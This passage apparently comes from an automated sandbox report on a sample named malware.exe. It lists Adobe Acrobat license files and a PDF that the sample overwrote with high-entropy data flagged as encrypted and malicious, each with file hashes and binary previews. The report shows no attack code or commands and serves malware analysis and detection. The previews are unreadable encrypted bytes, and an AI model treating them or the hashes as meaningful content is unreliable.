                        Preview:..H|..oN%..-. .w]..f.towy.~04.?..x......CgJ.....KG5.....k...F.a}.........f.........%..9.(JH.gr.@L.e....../tK8....$..|...).V;.M....y.;....&.e..`..K.o).Ty.........+sD...RX#L.4..T.:>..kv.TNU.4X..c*.......5*.M..`.G."au.C.+.v.V...Q.W....sOy[.j..a..i....D./.R..{ezd......x...,}.W......<.jV."@..C..!Jg....h...a;...e.)..9-RVL....8.e.r.. {/.....j.kC..Z...-.A....@.7.>n.$5.......[.0...*p0{..Q..)..(!.D!.ZG.]!n..J..#[p\...PK......D..~......m..6sd.K..Ij<.1#v......%&...k....D...._..M.u7.u.h.......B=...<..s.....E...x.L9Yk.Q...s.f...:.,.uV.Qc..?3:1....:........Dhu.IpZ.i./..^..g...^dKZ.=t[..p...Un#."...zO~..Y..S..T.x......".(..9...OO........2$.....g.e..zDF.Lp#....;}....%\..}.{s.|.>.\...1.3...S.5D.~5...$8...q8.Y....WS...7..H^ >B}Qi...I.Vi*..-a.........^..Z...U.@.....(.K..o....C.....ZLVz|..#.......1..3.qI5..ro..T_w1..">.;....'.!..p\.A.er$.4.3....:..v..Nx...{t%.F..../q..qhj.-....}J._F..{....^?C...5,....L.l....J.R%.\.].;..L..~..^...5D.ByW.....*../.g>.....P@Z.).h...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):35084
                        Entropy (8bit):7.995083800342415
                        Encrypted:true
                        SSDEEP:768:bmv1gE7xAxRaURlnVJkb1CfPOBoWgyLAowH67bnU8:+d7xZmFPkb1QPe3ya3nU8
                        MD5:A9B7158116DD0C56818337B4E848E643
                        SHA1:D8C85011482208EAD04A0DAA60BFCBE193821F31
                        SHA-256:B93F7C998664BE4C1A64EBFF9A0BF81073C5E5D44285E8A9ABE864FAE5E5D3A0
                        SHA-512:B9CDAC4C966B9E9887A5B06DFDC7819A5F7174B08CA1A22F0F97F9995BA2DB51BE62C49887595A28A048AD3765B4A9624ADA878BA139BA2E8BDE9DCEC59D2765
                        Malicious:true
                        Preview:..~...6.....OrC7..q.M$..*..^....%.7....SN..Q.C~.\. ...9.......h)..q?.{.m!@|1.,10Y:..&IT.m.a..F...\.....`..o2......N.17*...u.\...\D.D..v.I.....1....(`......C3.33b...vD.m...RO.dS.[.E]..k6.k....T.[......._.wM..H.)xC*.k..A....@.)........*e.1..o^.|....k.47..|(.V........9..u1.n,......%`Y}..B...8.W..~F2.o.....m.......b.F/..p...(........$O.[0.g..M.C.y.V.Q(r>.+.Z....N......Ss.Q.O..1...<..b.%....{...O.d <.k.&.._6g?....pj..!w..6..4........l_...4vf.1.<..!..N..|k.........+.G.[.`..[...Y.3#;I;......~.6..tUx.r.....f....J.w#...Y..18....y..#.K.r\..R.5...M....%0.....Ur..PG...@..d......Z'?*...9.....VW..x...M,.q_.......R.-..=&)..).J.G7.m.a..>|.......b..A....x..{...c...u.4.7\Y...j.)..^.0..f.5..Y....RO..F.S....c.$".....a/.8j.}....%w..Cvu....._R..x-Z)...&X..[...../......A...uN......cRF..:5.U....0....3o.3>.f.=..H..^| m....C.Q....f...R8Z.xLO.....@dW.U.N.~b.c.#....cb|.;.Up..x.....~.C.+][v.,R67.2n.7...-....^Y...%........1...6.3.;x.g.......\rU..M....Q2..u....\C%=.6..3...;....J

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28582
                        Entropy (8bit):7.994297296937475
                        Encrypted:true
                        SSDEEP:768:rC1m04g2pADHBBQp15Y1uW3otg4zQacyq9eXjUn5:q6gdTLEvY9Ug4slyo2U5
                        MD5:0E674ABF93A3C024366210C999396C8A
                        SHA1:6BF13F0671734E4C80BD18853A168757494532E1
                        SHA-256:69C1B0A62EC8662C7F331A24B8051F4E373891ED7C986174F4998F7B1E6A708A
                        SHA-512:16D2F6F22449D9E61C69E20C165707CE4F1F2131F5632B976271556CB94A4C428567BCA75B97483B6958F5585E76850E66EB71FFF77413F98403543B714B06C6
                        Malicious:true
                        Preview:Hx@.o.$.W.3..w9...\|hN....P:.x...l....w...2....y.0p.&..Yj..U.".W.K..N)..*.x.gA.!w..F2=/...H.W=.4j.h..a...:..gb...J......+4..i.*. ......u....u..Fe%..../.+..7.}Q..Z...@.)b:]....=...h..<....Y..jI..F6..u\..f.#..X..l.b..8l...K...=.AE<.A.._..e..5.X....T.T...#.s.....k.vtH%...:&.%..<[.......ey:...M.Xr...t...kT...K.`)\..C_@N)......U.'O..F.....}p)wf..-.ha...;...g)v....8Qn6.. IS.A...qBC...X..Y.JP.@....EC../4.......$.......X...8g...|D...g.thU..'.l:....n.E.>.q..&f...@=X.........RO~.. ...Y>~}&..}+ab..7FQ}q....C_.q9.:..w.nYz.>/.rsp..(c.AD..Pb..+.P..!.z$.E&..J0.....?6ZG...x..g'...~a...=~.7.8....v..g..[".-T...I........_.f(.{.`.sw(~..O.r......D]).L.F..1...6..id...G...-...OSVk...S.M....I].9#...........%G..."d.z;I{.9.....-0..}E.....JS....5.<....J^b.lO..._..DKD...)...}....3#.\...;...5..p.%.NI...j.&..........=A.~.Jv8.e.F......<..R.I.].$.X..>..UGu.....O....8..pw......\ .D...X`^..E}.g..Q........ze........Ve.>..[..jD.....O.-.!..1...U)tP7u.:...6A....u.m.$...{9N..9...N.:

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30618
                        Entropy (8bit):7.994223108005883
                        Encrypted:true
                        SSDEEP:768:eaF0pdC+raLJc6nG4LQb1zWJWuZWGKhNBZofxa3XhIoB:ea2p0+rgLQb1zZSWvhHHXhRB
                        MD5:A756341BA12C207DB73B8A41B0BA711E
                        SHA1:176C72BC5DD3497E65F282166DB80176115714B5
                        SHA-256:E89F8729A2D9F889B5809597A34DC9FE890D062AAF43498FB60A3FC3FC653528
                        SHA-512:A94F246E17F600441240FA357C40844476CA08D4417F22BAFA47D2A10ACE90B50D6EF5F65CF51BDEAE347920529AE8955FAE0A61075213F1062D1A1EB83AE15A
                        Malicious:true
                        Preview:$......._.]............N.u.....W...9..#0.J...:.z...2.Y.yZa..L7.`.$y..5'..(..<J..d.(...e..W....2bj....N:......hIP.,gf.H...Zq.A~9E.mg..*.!....l..A........d...............*.v.f..,..&Z.....X....V...t.A..%`v..;%o.....{.M....ApcYo....-.}.Y$.Z.n..........BA.k2@..qB.|.w.X...}.GD...ri..g... W..]....s&.@.,.>.........G..%.p.o..4..}..)s.(..pdD.,. .|$..o.....p,S.../u....o+G...M~..W..8R[............?..z..6Qr..O.).B..&..k.I.1)#x[...=.C&....P ...F..A......T....Y.S.8.kX....[L..+*..l....g.....b [.l..o.Z.n...zu.x....\....].D...b}..(P.Z.c..|..>.q......:Y.]*.4.GOs..\..a.W..{..FU.9..R...@)...C"T .k..3'..9.a.5...Vj.4Z............+..S..om.............}.k.s r.=.`.3...u..%b.b....|+...H.......y.6T.h...k.;#..Ij....B.A.,h.$.......tiR..z2.]...Y..o(V..>...-.....3h........'d...fZ.h)0d.S..._.o...>0..;.....gH....z)_xe..2.4..H.a..QB".=..I<....t...F.q:..H.PI;.l|......9...2.6....B..mhlm..5:P.8[.o.F.*... .7.....c...K.....R~..O.Q..kj...r..~.kbS.......`.<6.<|.......

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):35447
                        Entropy (8bit):7.993855363757724
                        Encrypted:true
                        SSDEEP:768:LjZv7/S5QQoCmhJ6IhkRVJ58ijcGX+yJ0MGG4JD21m77MMwt1Oh:LB7/S5foCmhgeijHcC+K1I7MMc1k
                        MD5:83170942ACEB29607EE61F8C291CE74D
                        SHA1:EDA0E9369D09C320005CD1EF898512A38B72D012
                        SHA-256:483F6A597425F5C15EC30BDE6A7EF584ACBD25B6E6D6296EE39512AA2F18E0BC
                        SHA-512:F0BBC725C46B73C0B18710FA638836499CB55D336AEE6EE8328E173D531707ECFD72161AF7BA61F22503624C6BAE7375DA0D9A396B6C81C3AB623021C3FBDF84
                        Malicious:true
                        Preview:KM.b...d....$N.._'........w.anO..g.2C......n...-...Z@..eKI..n!).g.sL&*u@..M.......5.OO.]pct..n.nK...]P...Z,..ZD.'....*.....g....?^..u..F.0..<.*wl......./.m.....H..g.Y....T.4..e.}.....x.L&...~.K.B]/.!#};....v3.1...........4.o....]..I~Z.#......B4.V.......|....~n?O.c.cy.w.+..S.U....3.y|.....F.Mz, `...k.a.#.we..2....`..f...........t.i.....j..=...UZu..?8........(j......Ro.9...J..?.8[.N.7.X/...:..+4.N,d..KW.k^...+..+y\....q......,....^...F.....*.O.....<.RLb..'...I......Z............,&3.nM..lB.e..4.:.j.Ey.........~..(.....)..#.1....SU.dc...u............S..'..Y9W{..)x(........[....<N..K.#s....h...+9....)7.%s.])k.....jZ..t&.;eN._.....OG.LyBO....I3OOe%`^.%5@..?F.a]...0`..!.l.W..Zd...!Y.^..>._.}....s.......GZ.?7..Pa..6.B.K.V.p.Q.9Q.+./.`......."..a........F.G....."1.........Q...X...[H.q......e.I....t@g.@.c9....T./....-.Dc..?.......`.`G!...".$..3..n.r..e....?...d.e......V.|.H......hI.xd...^."YC.z...a..s.G...:V.Y.c..sew4..l.a...5..!.J.&*..h

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30256
                        Entropy (8bit):7.993075056217979
                        Encrypted:true
                        SSDEEP:768:ZuhB0roVDj3+18C4IywRHI54UvFFqm83gKIHoxRuv:UrUMIywRutvFFX8zlxRI
                        MD5:2B5D9EE6DEF263C2EF866E16E45B7B04
                        SHA1:AC6F2A78C168C4BB78EB22BFA081A3D64AE007B9
                        SHA-256:B932B63A10BA10FB13F2E10645351D0DE55894C552165961D306EF63ACEE9370
                        SHA-512:4A94D914CF22531F48689703B02D2FB4897AC3756C2B769B5610ABCBD6DFB02E53F93A7AF5DCEDEDB5815FDBFBA9630DE4886653DEAEF7D096B59EC9722CC201
                        Malicious:true
                        Preview:.$..q.. .n.y..+O..[oU.DV.;....f.r. .b.._f..\...f..N....Qp|Z..$Z.z....g-.|.+.wy...@..~.?..Z.w...H.\gq.84N....0.!.w#.n.590...7.[.......U.@.@...~<.R.R.o.b,...p...<.0.2'...k2.t.Ay....C...V........I.5..n.X.s..k.8..N....d....D.C*BRQZ....7R..].u.F...w...l)fl.'.).?....k..v3...<.vDg.+..z.o....2i7...P8.L.....-..8..X....;..M....a...T.-E$.S~.'.>.`...4......D......U..x.....0!.l.L5q..4.-.. ..\...h.[H..=...?..O.K..~......c......d.g.....o...s^d;...L.\.S;.]..[c...(,..&.t1.K..`.....Y.;..+..U~....*...t..sK.JV.W...=.......Y...G..L.(H:....t..S.....Q.@..J}...y....c.v[Y.3..S...:1.-..Y#@,...H...].)..s..9.F9m..17...c...DW......w..`T.=.YlF.LG`.K3....X.(..1)M......X......k.-.{....<......Z.....v....k}r_.}.....w...x..*...PD/......H.r..5..{_o..U_.lT.3....du..$u.k....vq.x.Y1..P....,..>...y.1.....1N.<B..L..D. i.p..<..O.......;..&.1a....GH.k..).py*.a..pZp@.?EZd..D......{V...9..k.[.V.)...!......I...(9H..e..."eTp..[.MAQ/q'..0....U..bP<..)T?.......7..e..E...}#y.......

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):60775
                        Entropy (8bit):7.996674848078993
                        Encrypted:true
                        SSDEEP:1536:8IznycXiLpMDi1JUqrtK74ZChb/nkU3lCxQxZOopw9raVkV8Q:DnDXKpM21J7re5CaxZOpXGQ
                        MD5:597BE58CC18961D34D37E5588D3BD84B
                        SHA1:8F0601857F72DE1981DB708185AA6655ED026036
                        SHA-256:2FE4912B93176BC2F5160D7A966A68D1B47B467FA8A5B7FFAC6511B3B0705767
                        SHA-512:AFE6BD424B709BDC9492622D41F5B883BFE7265FCE8B4DBA7D6611932C924AE22314932FFA5BC687D610079EA6D519E6D8152CCA5E5AD8FF29C0CDE63A20923D
                        Malicious:true
                        Preview:..Q..AJ....w5X.i..V.......)/;YTL..m....&t.s..z?..s.@7.....l...2..[....z..........'G.4.^..l..y2am..F...*[.......>.3..\'5.A5G2..S.R.Pd*.........n...l..w......Qq.4.<...T0@2.P.........=Iq^...^...`.^2....e...Vx.k W..b;.S.L.9.rT.zw...k.4..1GI3.s8/.4.9..O..C....Rd...\.Rf.D..|._1..s? ..)]Ka*N.........lj...v.C....y..Tt[.e*E.|..L...$?.|U.u..2P...'...h...]?i.4d..hn)]-.E$...?...w.M......i<..V.4.).c<.K......h....(..}...H~...f.....\...-.f...{.P+..=..|.F...\.;.U....p..G>-&.v8.........`D..Jw.E...B..{..-...............a...C..dc.k.w..t.y. ........a..r...#@.....3.\KU..!=P=..8..{Y../.r;...BC.u..`..l.m.k.~...GY.....+..V.Z.=...3...u.c?.P....=..q+.J.I.....%2.m.&Y...`...w.....?w..zt...u..X.....{.....D.O....>..R...,.........R.;....(..0...V...2t.].....%..eS%...`.'........T......L..*......o1#.J...P...A=...c......{?`...L3..:...".O..Wq..%s....,..XOk..X.(;.......fG.b..iQ.B.v9PVT...(...?.....GE.@..oES..Q........`?...J(....T.c...Ym..k...Z.W]P..0..../......LL...MG`

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31117
                        Entropy (8bit):7.994297388555172
                        Encrypted:true
                        SSDEEP:768:lyFCJCPcv6ypJmuhdT5EZtsy4GaxRoEx9DqedhyBkR77w:mCXv6ypJPhd5WwCedMBuPw
                        MD5:167711736E3A01CA20C4FEE073334EF2
                        SHA1:8F2024FF3473EEEBC8A7B339CF68BAE0A9CA50EB
                        SHA-256:D89386C467ECF11D1910B54559635190198F3C7F76ABC4D8EDAF9CFD89B42578
                        SHA-512:4AE39004229A55FE857D41CD2801CE3A930797B76AAF4462B3C03BEC77210BC0BCF36EA0211A51F5650D7EAF3235B62704D49903B60B93522F56DF0A5CA0642B
                        Malicious:true
                        Preview:Z.=.d......S.B..........o0.).(..C...p."..8..k..0oaBue'.YN..%.....0d.Z#.?...~F.n{....{7ld.....Q.s/\..x@@w.5.A}ej.....h.w....f.R4Qx@..vC...A.=.~k#...l*Q....P.80.lbl\..w....:.N:G.C.4.R.@.......Zx..G.-].J..*.......ET...v...}....^..KPF...mu.p.US.m..a...d..g.aC.....:."Q..!L]JA....5.X.8..a.W'D......W.k..)..6..?QG..M..Q.e ...3...,f..9...&5.z...F=._`.t.....m.....'.Gv....i....[<..f...yiX.ukRY....d...t.g..#.A.rP..j..^v.).V.G..'s%...z1;.8...`.Z.g).... .o2Ye.at....i9....]..9V.X...t.d4..Xpd...>...`u+.D.AfF.......?.=A.6?.|@.d...RXO*bj......S......9.......!1..;...2....q`,.........5.k2g..j..WY....;...>k.X(P."%;I...D..&.A..W!...c.v@q..BCo.|..m...R.^......b...{..V.e....Un.....0"..v..&K.9..=e~WN.. ..?._SV*:.{..~.....[\..`.8.9......(:...T7....0..dv^...SP....W.....,......./............DHT..j`. r..G....1...`..LCk.(^_A....i.#.....0...p.....v..g{.I*.)2..)...v\.=....Zx.Y=.<..g}.}62.^2.f.....h........^F..}.I3+....c[_A.DT...v...h.9.k.T.{.*.Jf...._..a.2..V*..t.3$

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30175
                        Entropy (8bit):7.994129693861333
                        Encrypted:true
                        SSDEEP:768:icFjraJkS2kgbhZqPYNTf0oe1PbVMUNxzvtFM+:icFjXSrgbhZxN7ttUNJN
                        MD5:FD31B60C66FA15F5D86E799D7CCDB845
                        SHA1:1D085C568235C4B289AFBC0D3EAF192515412DE2
                        SHA-256:0B07B109E54C4B4624C6B89F06A931335A1DF12B43A2B73D96DF913EE6B0C32D
                        SHA-512:D7C27E3851E0DC24F34F91EE2281D803606D9B3A6CAC6E60764FDDB6E9E223AA958B6D6EEC19E5E0C8C21682F40219CC33582F98AFD942F32EC5D7867D1C94D3
                        Malicious:true
                        Preview:........r.hK...(..kr."a..1>.?.G.&..5.....\.r.r...+\.yl....x.E..~.YH.z.F.m..6.{.m.X.P.m...*.H.....Bp...a....6..R...r....uVZ..D..1...s.M2..{.o..x.........b.&F.U.Z.....I....".'.h.ENd....i..;.|....f./F7..Q..5..(..&..S.C..G..-.../E...5..}1...9.$.E8.r.......V+..M...xDE..C./.s_.9.D..'v..m.j.%X.u=..o+...Qy.:.1m.."...~i.W...+.;^..1 w.Pe.X..(.`.}..y.[....<...`S...{...qH......O.d.<.,b....3.X....."..h."1z.I./.....)\T|...p........V..s.M@.iL5..wID....O......j..RBp..w}......)@0k...O.........lI..S..6..;....hNG..v.&..e....x..J..4O.".* ..F.f..3P.~4.....gg.s..pi....fU..z..s..k:......4.W.W.A......C9|.s !'...w..B.L...9.Y..<.#s].4.9.0.....BL..f.'k,Ck.y..MF...q..q.X..X.JOq...<.Q..X+pp.[H.=,q'....t..#...V.C...k....%.....(.R#..#Z...F..?..9mxE........m.E..*.|..+4..4P..{.(.|...<R.w.A.OJ.e9..j...b6Q.?.k..\.!..6..=..{!..<.@4..,..f.t .c."s..GMat..J.sS..k.........f.?.2.x.rSq..5._-.%N/S.iG..2!....,..s...1r...{_..A.....dq...O..\v.`6C3..3..!.g.......y..6.+H.=..d]y$..I|...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29905
                        Entropy (8bit):7.993926688062169
                        Encrypted:true
                        SSDEEP:768:JpGzZB0ETmHN0VjqviZpN7SiH2lncJvTyp/G9n:XqZJiHN0Vjqa5SiH2Voep/cn
                        MD5:6FC4C9C04AA76648C3DF4C41942579EB
                        SHA1:5781D1CE3E5427798332A3F12219F2E867F72AA6
                        SHA-256:42F8A1B3587ACEA4D1D61F7A8EA19A525BFF54A774798000EFA3A66A846888AF
                        SHA-512:9C9345513B27795E94FD1620F1F9F0ABE279C198C22C8E484B66B89A2C0C2A9E3F81BBFD4E34E8A03B6ACB4BF4F58C135435654D5782D2D329B9A9F722372B0F
                        Malicious:true
                        Preview:~..,...........A..5.A......q8...T.......3...Px...?}GJ.=.jI.W...<Q.^O......m..}.S...L.. ..*...l.5..w..mOq....K.T...gA..B........4.....$|#[..(~<Z..O...r!9.k..s..QN.+&.h.2.0...91..g..5K....I..5.....znX.I.....[|...|.C......p.vi.].w.G.[.@}...&&.....(....]^!$...ut5G.\!.@..hr.Rq...4.B.t..)....I}..%.~-...*_d.]..Tn...L....Cp|H.. X..7.mD....~<3<,T.......8.A4..R...!.d.N..5....vJ5..au0..N...o.UR.5.v...|.U5.A.H.Y..=t\..C,g...r./;1w....c........B....N.=Ad..>.P.VnxX.h.>.6.....2.:...i]^~#.=>q.*.)..o.....z....._d....\..~Q9|iT.......TE],...).Jr\..Q.s.u....p.LI/s.B.....CN..a;qD.C.\@H.>..H.}..../k...._..(....... 3p2n.H...B*.D.}.m.^.i....".W`..w.k........).....F.....0#k4D..Q.,,.........$y.M..I....A..-...a +.rv....B.(n..g.c.!..C.{.....Z....5r..bV....~...Q\...lQ.).D.B...%..ts ...E.....0..5>..!......S....;.qs|e[.8\9......1....H..'[..UO...:P.h.o.b%...r...UwH_w..{.4...r..."..ed..c..vH1...e.Ol...a.d.B..{6-.*...~.Dd$.]|:.U.L..7.......:d>...<..=..]..V-... ,..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31466
                        Entropy (8bit):7.994717117959982
                        Encrypted:true
                        SSDEEP:768:DBM04yDyY0Oy1CJA8bZ3WifnHl0P1PVWu0Pktlc:FMEDyY0RUJ3hWifF0PJ/Yz
                        MD5:4C434578184BA863EC124A09447FC7CF
                        SHA1:549049D85B7A812359728920CC7C06FB7652E4E0
                        SHA-256:CA99A8D30720A17807884D47C668F9202A939E4B7A076422A7C20D17E8D8BD06
                        SHA-512:C6837C5D71D76CE68346D218A284C30202FFC873BC8F24940EECB901C6FE74D9F1C8D0F377A49F7D4CDBB20A7F67FF75C78CE57AFF734791CEBBE304A181E1B2
                        Malicious:true
                        Preview:%.;...D1..(..);g..P...U..^........\.}}...r;4mUdb{.f.g..z..F..]_.+J..*.XA..RN../T.R.....CQ`.ae.3\,|'..4..I.".....,...#i..mS..,?s.f.FY...@.$.gB%...ST...,....s#......{...\..."g..W0U.E..w[I......3....................W..O ..!.3..#...b..9....^0.=...}..h=.....eR....f.(...^;..5yH ...w.;/.....*..z.W;.....9n...G...<.D...&:.p.f!..]......G...... ..<.V..r..b.B....B.h..E...1.P............Z. OG...m4x.m.aod......-...)........\:..9......?.b<rz..P..<)..dL.".!.}..g....'b.......z..T..iF.c"A.=...(.H.o..Q?......X:Y1(......2..M6...uz.L.3.|..o,......_v.O>qN%..{I..G.d.$.."L.....4..u.!..?.)......BB1.]ul..P......:...wm(.(Ib...2..h.K.f....&...j..-$..NdF.=..Y\..x9.]!..E....k......7r...`z.h..)..L...i"n......AK&EM.GK.....7;"...."...W|..2J....s.Q../.5....,...emz.........L.0\..W...Y}^.\.E*.....:.....`..X..3....].>l4.>...4.v.Y....F.D.]b...V.S9p.`|+.q....T...j.|...rn^..R...............r.r..........{.GYe.S.....N...b[!.Bn.i...\4...1.^v.t.%.j..,.R.....v.K.jq...C......z

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56788
                        Entropy (8bit):7.996137761339599
                        Encrypted:true
                        SSDEEP:768:yIuMYmL6lMVriEp764vClatbsp4dVWqgSWkiphFtbR1eXbmLc1NYw108ux2yAEE3:yIuM16Yektov9v3pRbTgfd5v3tfd
                        MD5:CA378BD71979B012E0E32CFE18F2F4EC
                        SHA1:ACF8D5A0121430C8C47754B0A43E9C7C0FF524EE
                        SHA-256:9F1E5F15831534321FC1AB963DF35D5685D3F50AA85F458251BCE156F4B5D5D0
                        SHA-512:52346B4A04AA5E26B0922843268774E954B8997B63636303028BF8FF35074DADDC08C77DDA656AF189E3856B229261D06B0F6E90E4BA5D041986F1C36AEDFAD9
                        Malicious:true
                        Preview:n.\.1P......?...>..P.T..R$.>.T..9....Y......].Mf..........~1...M<.........f..|..Y..$D.A0....9.....~.jN.......w...\.]`..T..y.R.~...sQ..?.mk.0... ..V.............|.j......m..P..6k'...+......i.ON..&HM"...4..mL-.}.%......E<B.Y...G1...t.0Z.H.....sUY"....%..c......H.b.X.*w:+.../.......;....M..U.^g0..A..`..%..I](zH .=,.L.(BOJ(.........Q..*.U....,..........[M*..Z.....V..<..T.mT..lc..MQI.K.re..(8.M`./69....S1.0...^...........>..pP;...3^.%P.;.......O...'?..W....[5.Av.q{.X.d...}..s=.. .. U.A...y...r..e..N.$.'$....,2.......&..(.zJ..*.dYS_V.f......._...#.)..(L...17i......8.A.......1..2.'......9gv..@..g-...>sb..N!7...H.it....m3Z)....w.....0.<e...4.B..4...s..-...CG,...MFh....}..du.?&(..).T..>c[_.".D.f.....hT.*.xVG.Yj...\Z.rXy..O,[..'...l....M...v.D...m.$i.5.K*Z.\.X.9/.5...R.5...O....E....2.|.*...Rg"J.....-..|.A.R.x....TeF......j......N...#%.V]....y......$.K[..|Kc.S.gf........m`4..a;...Wh.yZ.{|*.Y......PT.Y2?.KF...M6.*..s6..v.....u.b.q...c@h.|..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24052
                        Entropy (8bit):7.991215687329099
                        Encrypted:true
                        SSDEEP:384:FXQuoH6dJ3RVyyxI5FvMHuFor+ns6NOq6O6mOmIvie7c/p16+YW0NrCBH/qFIKjQ:WuM6VxqvMHuOr+D6ZqIlyT6+SEBSFooe
                        MD5:B223C5F07831E8ED4BA45EFAFD8D50EB
                        SHA1:E853671566B77A15BF0C7CAB89CE0873B65B443F
                        SHA-256:639A7496697664DA00DC381F2647D9FFD9855B483460322C773DCB3FA6E9E148
                        SHA-512:DEA788ADCB5CD8B3AD47CCA8386790249A0C1618A57D1C7E2FDE00E97F54E562BBEC81B90B84A03BA3B624915A6BC7302AE1A84B4CFA925B0A1ECFE323CB5FD1
                        Malicious:true
                        Preview:"w.$...~..nE=.A...V....d..bg.......F#..,.a.2b..9....n|. Y...9UK9.....T..(.%)..T......e|.Q.1.)r.6....i.9....u6..[...P.-.b^.p....~BP...w.G..P....c.E.0.ka.4.E\.7Bv.s$J...Tn..,....Mc..j.....w$X]..8..,.b..7......COCT.......3..4...7..o.akWm.<.+...=.Q.<..~.;..:=.o.......i.m.H.4T.0...w.e..F............n..{.!f.?..qO8%.g.-..ia.W}~....Y(.#....Z4..z.o..{..];.Y.x\.....h....o.Y..W.$...'...{:!.WY..U..9...8..........$?v....2.{TL.C.U.X..4.q..u.%.'..#(5.M.A....6I...G.......X...7.z..O.4G6.Sf..m.....M...nKT.v..ki,..gZ.!L ..+~..Y....,..K..Z)...k}7m...S..4H...D..=...S..q..|..,..8..`...._....*..g;.Fb...pF...u.fd....!p.BG.N.*.{.|P..&@M.1e..A.S.E.9/Q../W.]~...I. .V_....f..G9...c.V\..`.Z..Y..y'.`...~.w&....S.`...KM..O.J.|....s.}p..........7..B..........!\.C{..b......P...zi....;~..Y.@..6...'.^o.Y.2.}.a..o..*..dCjB.....#;......0;O..a.h...A`YmJ.$...J%.......d..I.9.;...yn.fSku..*.f......^[....Q..9.....!>B.K......>^.6L.....~.....,ECN....T....!GS..]9..a.....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23065
                        Entropy (8bit):7.991086046239372
                        Encrypted:true
                        SSDEEP:384:7WvfXaFRNkKUOkGlAQLvg6aw3yxnN0Bx5BAMs2pT8UOj7i9uNAqe2igWzcP3mxMB:7WvPQbkjfGl4cQnGH5iN+T8x6Qzincqk
                        MD5:E4B20961AE02BB8820C313E59607FE7F
                        SHA1:176436682925327AB89F23E9F8C528BDD50BC2B6
                        SHA-256:51C7DCA245F63BAED3406CE276A317888A20C7D69EB6AB91BAC93CABBF674F68
                        SHA-512:B8164D63C1DB1889A1184B35A8B0388A638A6AFBA555A793E22A06920CBFC023384F614765E8FB74226467DA3F4B231CDC7C10CE108D9D09E5E6008639D551CB
                        Malicious:true
                        Preview:S.U=....cw.g.mU.Q_........LK.V.%+.L..o...`..##Ht.m.........C= .L..dl..G.W..01....FP..n.|@...._.."x........OiV..R.....L'iW...C.Q..0......hzR~../..6............!..|..%....#...S.....&.......r..-BJ.....\Cg. ...Uc.L.}S..=.....z.=...7.W..1...qoA..d.~..h.7!......" ..^.Q..7)..{Z5.ISk.......>o%..q...Y>...u..Bu.#..t.q.f.....K...rUX.~..i..]..q....C)0..T86...*]...'u1..B>..`.`.*...;..(+.<.D........F 5..$..:..<....(C.&....2~`.ed..0._[..J.....,K.'...h.V...J..d...'.H7K.s?.[.JM.....e...}...#..%.zX....i<\../........o....C....>.%.............ji..Qk....-......=n.....5...Q#R:.B....m..L.....u.E.cY...M?. .6...m.t......`./j..2.PH....c.....`t\..y\A@d...<>p:..].S.O...qf...........;..a.w...[...oM.l..f....K/G..6.l..y*..Lmg8.,[KoxkE....(B.7.n....$......Q.E...vw..9..\..{.3.....!..>...h.p.v.+...t.-.W_O..6T(.o.MWl..t@.W.....{....K.3V.B.. ........!.<.......)#+Nq.6...(c...Jg1.w..@.9."'..00].qd.Y6}'.!.......+..Z+.W9.Ru.v.....9e6.D=..T ....V0....K.t...7...3s.r...B;..'...s

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\PDFSigQFormalRep.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):468314
                        Entropy (8bit):7.997770113913747
                        Encrypted:true
                        SSDEEP:12288:1N6nKI0WIEqM1SC2juDkc6CjHuy9AtJABJLQvi7ug3LS:U+VEqSrKc66FutJAxcg3LS
                        MD5:672C0D89EECA8F22A6F54CC95FBD70A9
                        SHA1:F50206DFF1300F9857B1FC0BC4BB6507F33BBFA9
                        SHA-256:26AEAF63B9999A0123807EE0A3ACCE1E37571749AE809AB2AE60C5C673826F88
                        SHA-512:780F6C1F2444FFCB4E01EF488CFF81A04E4CF35385DA9792F628B5868967C12ACF440A6EEAFEBAEAD7A547810192CBA84CE9E409F86952737264A7FA6E7DF559
                        Malicious:true
